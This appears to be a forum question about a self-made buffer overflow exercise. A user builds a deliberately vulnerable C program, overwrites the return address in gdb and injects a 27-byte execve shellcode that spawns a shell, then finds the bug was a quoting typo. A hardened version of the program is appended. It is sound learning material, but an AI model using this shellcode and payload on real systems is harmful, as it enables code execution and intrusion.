
I am trying to do a simple buffer overflow exploitation by overwriting the instruction pointer %rip.

Here's my code for vuln.c:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char* argv[])
{

    char buffer[256];
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
    return 0;
}

which I compile with

gcc vuln.c -o vuln -z execstack -fno-stack-protector

As discussed in the question here, I am confident that I am able to control the instruction pointer by feeding something along the lines of

gdb$ r $(python -c 'print "A"*264 + "\x7f\xff\xff\xff\xd8\xc0"[::-1]')

to gdb, as this gives me:

Stopped reason: SIGSEGV
0x00007fffffffd8c0 in ?? ()
gdb$ x 0x00007fffffffd8c0
0x7fffffffd8c0: 0x4141414141414141
gdb$ 

So apparently I managed to redirect execution flow to a place in memory that I wanted.

Now I want to execute some shellcode at this position. For that I use an execve shellcode that I compiled on the same system I am trying to exploit:

$ objdump -d spawnshell.o

spawnshell.o:     file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <_start>:
   0:   48 bb 2f 2f 62 69 6e    movabs $0x68732f6e69622f2f,%rbx
   7:   2f 73 68 
   a:   48 c1 eb 08             shr    $0x8,%rbx
   e:   53                      push   %rbx
   f:   48 89 e7                mov    %rsp,%rdi
  12:   50                      push   %rax
  13:   57                      push   %rdi
  14:   48 89 e6                mov    %rsp,%rsi
  17:   b0 3b                   mov    $0x3b,%al
  19:   0f 05                   syscall 

Spawnshell.o is tested on my system and works.

Written in more compact form:

\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05 - 27 bytes

Now I would expect that I should be able to inject this at the beginning of my buffer, pad the remaining buffer with "A"s and then again overwrite the instruction pointer at the end:

gdb$ r $(python -c 'print "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05" + A"*(264-27) + "\x7f\xff\xff\xff\xd8\xc0"[::-1]')

If I do this, something else happens that I don't understand: I end up somewhere in the __strcpy_sse2_unaligned function at the following command:

<__strcpy_sse2_unaligned+551> movdqu xmm1,XMMWORD PTR [rsi]

and a segfault:

Stopped reason: SIGSEGV
__strcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S:296
296 ../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S: No such file or directory.

So my interpretation is that the strcpy function is choking on something, even before I get to overwrite %rip.

What is it, or how do I go about finding out what the problem is?

schtopps
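For comparison, the hardened form of vuln.c a defender would want, added here as an example and not part of the question: it refuses to run without an argument, so strcpy is never handed a NULL argv[1] when the $(...) expansion comes back empty, and it bounds the copy to the buffer instead of trusting the argument's length. The copy_arg helper and its status codes are my own names.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256

/* Status codes returned by the checked copy (names chosen for this example). */
enum copy_status { COPY_OK = 0, COPY_NULL_SRC = 1, COPY_TOO_LONG = 2 };

/* Copy src into dst (capacity dstsz) only if it fits, NUL terminator included.
 * A NULL src is rejected instead of dereferenced, and an over-long src is
 * rejected instead of being written past the end of dst. When dstsz > 0, dst
 * is always left NUL-terminated, even on failure. */
static enum copy_status copy_arg(char *dst, size_t dstsz, const char *src)
{
    if (dstsz == 0)
        return COPY_TOO_LONG;
    dst[0] = '\0';
    if (src == NULL)
        return COPY_NULL_SRC;
    /* Look for the terminator only within the first dstsz bytes of src, so
     * an attacker-controlled length is never walked to completion. */
    const char *end = memchr(src, '\0', dstsz);
    if (end == NULL)                 /* no NUL within dstsz: does not fit */
        return COPY_TOO_LONG;
    memcpy(dst, src, (size_t)(end - src) + 1);
    return COPY_OK;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];
    /* The original called strcpy(buffer, argv[1]) without checking argc. */
    const char *src = argc > 1 ? argv[1] : NULL;

    switch (copy_arg(buffer, sizeof buffer, src)) {
    case COPY_OK:
        printf("%s\n", buffer);
        return 0;
    case COPY_NULL_SRC:
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    case COPY_TOO_LONG:
        fprintf(stderr, "input longer than %d bytes rejected\n", BUF_SIZE - 1);
        return 1;
    }
    return 1;
}
```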

1 Answer


Good lord, I messed up the quotations:

[...] x57\x48\x89\xe6\xb0\x3b\x0f\x05" + A"*(264-27) + "\x7f\x [...]

Voting to close/delete - sorry.

schtopps